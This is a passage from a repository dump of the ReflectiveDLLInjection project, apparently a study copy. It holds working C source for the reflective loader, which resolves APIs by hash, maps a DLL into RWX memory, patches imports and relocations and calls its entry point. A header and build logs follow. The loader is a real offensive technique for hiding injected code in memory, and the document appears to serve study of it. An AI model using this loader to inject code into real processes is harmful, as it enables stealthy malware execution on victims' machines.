238 | 					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
239 | 
240 | 					// store this functions VA
241 | 					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
242 | 						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
243 | 
244 | 					// decrement our counter
245 | 					usCounter--;
246 | 				}
247 | 
248 | 				// get the next exported function name
249 | 				uiNameArray += sizeof(DWORD);
250 | 
251 | 				// get the next exported function name ordinal
252 | 				uiNameOrdinals += sizeof(WORD);
253 | 			}
254 | 		}
255 | 
256 | 		// we stop searching when we have found everything we need.
257 | 		if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
258 | 			break;
259 | 
260 | 		// get the next entry
261 | 		uiValueA = DEREF( uiValueA );
262 | 	}
263 | 
264 | 	// STEP 2: load our image into a new permanent location in memory...
265 | 
266 | 	// get the VA of the NT Header for the PE to be loaded
267 | 	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
268 | 
269 | 	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
270 | 	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
271 | 	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
272 | 
273 | 	// we must now copy over the headers
274 | 	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
275 | 	uiValueB = uiLibraryAddress;
276 | 	uiValueC = uiBaseAddress;
277 | 
278 | 	while( uiValueA-- )
279 | 		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
280 | 
281 | 	// STEP 3: load in all of our sections...
282 | 
283 | 	// uiValueA = the VA of the first section
284 | 	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
285 | 	
286 | 	// itterate through all sections, loading them into memory.
287 | 	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
288 | 	while( uiValueE-- )
289 | 	{
290 | 		// uiValueB is the VA for this section
291 | 		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
292 | 
293 | 		// uiValueC if the VA for this sections data
294 | 		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
295 | 
296 | 		// copy the section over
297 | 		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
298 | 
299 | 		while( uiValueD-- )
300 | 			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
301 | 
302 | 		// get the VA of the next section
303 | 		uiValueA += sizeof( IMAGE_SECTION_HEADER );
304 | 	}
305 | 
306 | 	// STEP 4: process our images import table...
307 | 
308 | 	// uiValueB = the address of the import directory
309 | 	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
310 | 	
311 | 	// we assume their is an import table to process
312 | 	// uiValueC is the first entry in the import table
313 | 	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
314 | 	
315 | 	// itterate through all imports
316 | 	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
317 | 	{
318 | 		// use LoadLibraryA to load the imported module into memory
319 | 		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
320 | 
321 | 		// uiValueD = VA of the OriginalFirstThunk
322 | 		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
323 | 	
324 | 		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
325 | 		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
326 | 
327 | 		// itterate through all imported functions, importing by ordinal if no name present
328 | 		while( DEREF(uiValueA) )
329 | 		{
330 | 			// sanity check uiValueD as some compilers only import by FirstThunk
331 | 			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
332 | 			{
333 | 				// get the VA of the modules NT Header
334 | 				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
335 | 
336 | 				// uiNameArray = the address of the modules export directory entry
337 | 				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
338 | 
339 | 				// get the VA of the export directory
340 | 				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
341 | 
342 | 				// get the VA for the array of addresses
343 | 				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
344 | 
345 | 				// use the import ordinal (- export ordinal base) as an index into the array of addresses
346 | 				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
347 | 
348 | 				// patch in the address for this imported function
349 | 				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
350 | 			}
351 | 			else
352 | 			{
353 | 				// get the VA of this functions import by name struct
354 | 				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
355 | 
356 | 				// use GetProcAddress and patch in the address for this imported function
357 | 				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
358 | 			}
359 | 			// get the next imported function
360 | 			uiValueA += sizeof( ULONG_PTR );
361 | 			if( uiValueD )
362 | 				uiValueD += sizeof( ULONG_PTR );
363 | 		}
364 | 
365 | 		// get the next import
366 | 		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
367 | 	}
368 | 
369 | 	// STEP 5: process all of our images relocations...
370 | 
371 | 	// calculate the base address delta and perform relocations (even if we load at desired image base)
372 | 	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
373 | 
374 | 	// uiValueB = the address of the relocation directory
375 | 	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
376 | 
377 | 	// check if their are any relocations present
378 | 	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
379 | 	{
380 | 		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
381 | 		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
382 | 
383 | 		// and we itterate through all entries...
384 | 		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
385 | 		{
386 | 			// uiValueA = the VA for this relocation block
387 | 			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
388 | 
389 | 			// uiValueB = number of entries in this relocation block
390 | 			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
391 | 
392 | 			// uiValueD is now the first entry in the current relocation block
393 | 			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
394 | 
395 | 			// we itterate through all the entries in the current block...
396 | 			while( uiValueB-- )
397 | 			{
398 | 				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
399 | 				// we dont use a switch statement to avoid the compiler building a jump table
400 | 				// which would not be very position independent!
401 | 				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
402 | 					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
403 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
404 | 					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
405 | #ifdef WIN_ARM
406 | 				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
407 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
408 | 				{	
409 | 					register DWORD dwInstruction;
410 | 					register DWORD dwAddress;
411 | 					register WORD wImm;
412 | 					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
413 | 					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
414 | 					// flip the words to get the instruction as expected
415 | 					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
416 | 					// sanity chack we are processing a MOV instruction...
417 | 					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
418 | 					{
419 | 						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
420 | 						wImm  = (WORD)( dwInstruction & 0x000000FF);
421 | 						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
422 | 						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
423 | 						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
424 | 						// apply the relocation to the target address
425 | 						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
426 | 						// now create a new instruction with the same opcode and register param.
427 | 						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
428 | 						// patch in the relocated address...
429 | 						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
430 | 						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
431 | 						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
432 | 						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
433 | 						// now flip the instructions words and patch back into the code...
434 | 						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
435 | 					}
436 | 				}
437 | #endif
438 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
439 | 					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
440 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
441 | 					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
442 | 
443 | 				// get the next entry in the current relocation block
444 | 				uiValueD += sizeof( IMAGE_RELOC );
445 | 			}
446 | 
447 | 			// get the next entry in the relocation directory
448 | 			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
449 | 		}
450 | 	}
451 | 
452 | 	// STEP 6: call our images entry point
453 | 
454 | 	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
455 | 	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
456 | 
457 | 	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
458 | 	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
459 | 
460 | 	// call our respective entry point, fudging our hInstance value
461 | #ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
462 | 	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
463 | 	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
464 | #else
465 | 	// if we are injecting an DLL via a stub we call DllMain with no parameter
466 | 	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
467 | #endif
468 | 
469 | 	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
470 | 	return uiValueA;
471 | }
472 | //===============================================================================================//
473 | #ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
474 | 
475 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
476 | {
477 |     BOOL bReturnValue = TRUE;
478 | 	switch( dwReason ) 
479 |     { 
480 | 		case DLL_QUERY_HMODULE:
481 | 			if( lpReserved != NULL )
482 | 				*(HMODULE *)lpReserved = hAppInstance;
483 | 			break;
484 | 		case DLL_PROCESS_ATTACH:
485 | 			hAppInstance = hinstDLL;
486 | 			break;
487 | 		case DLL_PROCESS_DETACH:
488 | 		case DLL_THREAD_ATTACH:
489 | 		case DLL_THREAD_DETACH:
490 |             break;
491 |     }
492 | 	return bReturnValue;
493 | }
494 | 
495 | #endif
496 | //===============================================================================================//
497 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/src/ReflectiveLoader.h:
--------------------------------------------------------------------------------
  1 | //===============================================================================================//
  2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
  3 | // All rights reserved.
  4 | // 
  5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
  6 | // provided that the following conditions are met:
  7 | // 
  8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
  9 | // conditions and the following disclaimer.
 10 | // 
 11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
 13 | // with the distribution.
 14 | // 
 15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
 16 | // endorse or promote products derived from this software without specific prior written permission.
 17 | // 
 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
 26 | // POSSIBILITY OF SUCH DAMAGE.
 27 | //===============================================================================================//
 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
 30 | //===============================================================================================//
 31 | #define WIN32_LEAN_AND_MEAN
 32 | #include <windows.h>
 33 | #include <Winsock2.h>
 34 | #include <intrin.h>
 35 | 
 36 | #include "ReflectiveDLLInjection.h"
 37 | 
 38 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
 39 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
 40 | typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
 41 | typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
 42 | 
 43 | #define KERNEL32DLL_HASH				0x6A4ABC5B
 44 | #define NTDLLDLL_HASH					0x3CFA685D
 45 | 
 46 | #define LOADLIBRARYA_HASH				0xEC0E4E8E
 47 | #define GETPROCADDRESS_HASH				0x7C0DFCAA
 48 | #define VIRTUALALLOC_HASH				0x91AFCA54
 49 | #define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
 50 | 
 51 | #define IMAGE_REL_BASED_ARM_MOV32A		5
 52 | #define IMAGE_REL_BASED_ARM_MOV32T		7
 53 | 
 54 | #define ARM_MOV_MASK					(DWORD)(0xFBF08000)
 55 | #define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
 56 | #define ARM_MOVW						0xF2400000
 57 | #define ARM_MOVT						0xF2C00000
 58 | 
 59 | #define HASH_KEY						13
 60 | //===============================================================================================//
 61 | #pragma intrinsic( _rotr )
 62 | 
 63 | __forceinline DWORD ror( DWORD d )
 64 | {
 65 | 	return _rotr( d, HASH_KEY );
 66 | }
 67 | 
 68 | __forceinline DWORD hash( char * c )
 69 | {
 70 |     register DWORD h = 0;
 71 | 	do
 72 | 	{
 73 | 		h = ror( h );
 74 |         h += *c;
 75 | 	} while( *++c );
 76 | 
 77 |     return h;
 78 | }
 79 | //===============================================================================================//
 80 | typedef struct _UNICODE_STR
 81 | {
 82 |   USHORT Length;
 83 |   USHORT MaximumLength;
 84 |   PWSTR pBuffer;
 85 | } UNICODE_STR, *PUNICODE_STR;
 86 | 
 87 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
 88 | //__declspec( align(8) ) 
 89 | typedef struct _LDR_DATA_TABLE_ENTRY
 90 | {
 91 | 	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
 92 | 	LIST_ENTRY InMemoryOrderModuleList;
 93 | 	LIST_ENTRY InInitializationOrderModuleList;
 94 | 	PVOID DllBase;
 95 | 	PVOID EntryPoint;
 96 | 	ULONG SizeOfImage;
 97 | 	UNICODE_STR FullDllName;
 98 | 	UNICODE_STR BaseDllName;
 99 | 	ULONG Flags;
100 | 	SHORT LoadCount;
101 | 	SHORT TlsIndex;
102 | 	LIST_ENTRY HashTableEntry;
103 | 	ULONG TimeDateStamp;
104 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
105 | 
106 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA
107 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
108 | {
109 |    DWORD dwLength;
110 |    DWORD dwInitialized;
111 |    LPVOID lpSsHandle;
112 |    LIST_ENTRY InLoadOrderModuleList;
113 |    LIST_ENTRY InMemoryOrderModuleList;
114 |    LIST_ENTRY InInitializationOrderModuleList;
115 |    LPVOID lpEntryInProgress;
116 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
117 | 
118 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
119 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
120 | {
121 |    struct _PEB_FREE_BLOCK * pNext;
122 |    DWORD dwSize;
123 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
124 | 
125 | // struct _PEB is defined in Winternl.h but it is incomplete
126 | // WinDbg> dt -v ntdll!_PEB
127 | typedef struct __PEB // 65 elements, 0x210 bytes
128 | {
129 |    BYTE bInheritedAddressSpace;
130 |    BYTE bReadImageFileExecOptions;
131 |    BYTE bBeingDebugged;
132 |    BYTE bSpareBool;
133 |    LPVOID lpMutant;
134 |    LPVOID lpImageBaseAddress;
135 |    PPEB_LDR_DATA pLdr;
136 |    LPVOID lpProcessParameters;
137 |    LPVOID lpSubSystemData;
138 |    LPVOID lpProcessHeap;
139 |    PRTL_CRITICAL_SECTION pFastPebLock;
140 |    LPVOID lpFastPebLockRoutine;
141 |    LPVOID lpFastPebUnlockRoutine;
142 |    DWORD dwEnvironmentUpdateCount;
143 |    LPVOID lpKernelCallbackTable;
144 |    DWORD dwSystemReserved;
145 |    DWORD dwAtlThunkSListPtr32;
146 |    PPEB_FREE_BLOCK pFreeList;
147 |    DWORD dwTlsExpansionCounter;
148 |    LPVOID lpTlsBitmap;
149 |    DWORD dwTlsBitmapBits[2];
150 |    LPVOID lpReadOnlySharedMemoryBase;
151 |    LPVOID lpReadOnlySharedMemoryHeap;
152 |    LPVOID lpReadOnlyStaticServerData;
153 |    LPVOID lpAnsiCodePageData;
154 |    LPVOID lpOemCodePageData;
155 |    LPVOID lpUnicodeCaseTableData;
156 |    DWORD dwNumberOfProcessors;
157 |    DWORD dwNtGlobalFlag;
158 |    LARGE_INTEGER liCriticalSectionTimeout;
159 |    DWORD dwHeapSegmentReserve;
160 |    DWORD dwHeapSegmentCommit;
161 |    DWORD dwHeapDeCommitTotalFreeThreshold;
162 |    DWORD dwHeapDeCommitFreeBlockThreshold;
163 |    DWORD dwNumberOfHeaps;
164 |    DWORD dwMaximumNumberOfHeaps;
165 |    LPVOID lpProcessHeaps;
166 |    LPVOID lpGdiSharedHandleTable;
167 |    LPVOID lpProcessStarterHelper;
168 |    DWORD dwGdiDCAttributeList;
169 |    LPVOID lpLoaderLock;
170 |    DWORD dwOSMajorVersion;
171 |    DWORD dwOSMinorVersion;
172 |    WORD wOSBuildNumber;
173 |    WORD wOSCSDVersion;
174 |    DWORD dwOSPlatformId;
175 |    DWORD dwImageSubsystem;
176 |    DWORD dwImageSubsystemMajorVersion;
177 |    DWORD dwImageSubsystemMinorVersion;
178 |    DWORD dwImageProcessAffinityMask;
179 |    DWORD dwGdiHandleBuffer[34];
180 |    LPVOID lpPostProcessInitRoutine;
181 |    LPVOID lpTlsExpansionBitmap;
182 |    DWORD dwTlsExpansionBitmapBits[32];
183 |    DWORD dwSessionId;
184 |    ULARGE_INTEGER liAppCompatFlags;
185 |    ULARGE_INTEGER liAppCompatFlagsUser;
186 |    LPVOID lppShimData;
187 |    LPVOID lpAppCompatInfo;
188 |    UNICODE_STR usCSDVersion;
189 |    LPVOID lpActivationContextData;
190 |    LPVOID lpProcessAssemblyStorageMap;
191 |    LPVOID lpSystemDefaultActivationContextData;
192 |    LPVOID lpSystemAssemblyStorageMap;
193 |    DWORD dwMinimumStackCommit;
194 | } _PEB, * _PPEB;
195 | 
196 | typedef struct
197 | {
198 | 	WORD	offset:12;
199 | 	WORD	type:4;
200 | } IMAGE_RELOC, *PIMAGE_RELOC;
201 | //===============================================================================================//
202 | #endif
203 | //===============================================================================================//
204 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/x64/Release/reflective_dll.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\vc142.pdb
 2 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflectiveloader.obj
 3 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflectivedll.obj
 4 | c:\users\hp\desktop\reflectivedllinjection-master\x64\release\reflective_dll.x64.dll
 5 | c:\users\hp\desktop\reflectivedllinjection-master\x64\release\reflective_dll.pdb
 6 | c:\users\hp\desktop\reflectivedllinjection-master\x64\release\reflective_dll.lib
 7 | c:\users\hp\desktop\reflectivedllinjection-master\x64\release\reflective_dll.exp
 8 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\vcpkg.applocal.log
 9 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflective_dll.tlog\cl.command.1.tlog
10 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflective_dll.tlog\cl.read.1.tlog
11 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflective_dll.tlog\cl.write.1.tlog
12 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflective_dll.tlog\link.command.1.tlog
13 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflective_dll.tlog\link.read.1.tlog
14 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflective_dll.tlog\link.write.1.tlog
15 | c:\users\hp\desktop\reflectivedllinjection-master\dll\x64\release\reflective_dll.tlog\reflective_dll.write.1u.tlog
16 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/x64/Release/reflective_dll.log:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/GetProcAddressR.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/GetProcAddressR.obj


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/Inject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/Inject.obj


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\vc142.pdb
 2 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\loadlibraryr.obj
 3 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.obj
 4 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\getprocaddressr.obj
 5 | c:\users\hp\desktop\reflectivedllinjection-master\release\inject.ipdb
 6 | c:\users\hp\desktop\reflectivedllinjection-master\release\inject.iobj
 7 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\vcpkg.applocal.log
 8 | c:\users\hp\desktop\reflectivedllinjection-master\release\inject.exe
 9 | c:\users\hp\desktop\reflectivedllinjection-master\release\inject.pdb
10 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.tlog\cl.command.1.tlog
11 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.tlog\cl.read.1.tlog
12 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.tlog\cl.write.1.tlog
13 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.tlog\inject.write.1u.tlog
14 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.tlog\link.command.1.tlog
15 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.tlog\link.read.1.tlog
16 | c:\users\hp\desktop\reflectivedllinjection-master\inject\release\inject.tlog\link.write.1.tlog
17 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.log:
--------------------------------------------------------------------------------
1 |   GetProcAddressR.c
2 |   Inject.c
3 |   LoadLibraryR.c
4 |   正在生成代码
5 |   Previous IPDB not found, fall back to full compilation.
6 |   All 7 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
7 |   已完成代码的生成
8 |   inject.vcxproj -> C:\Users\HP\Desktop\ReflectiveDLLInjection-master\Release\inject.exe
9 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/inject.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/inject.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/inject.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/inject.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.26.28801:TargetPlatformVersion=10.0.18362.0:
2 | Release|Win32|C:\Users\HP\Desktop\ReflectiveDLLInjection-master\|
3 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/inject.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/inject.tlog/inject.write.1u.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/inject.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
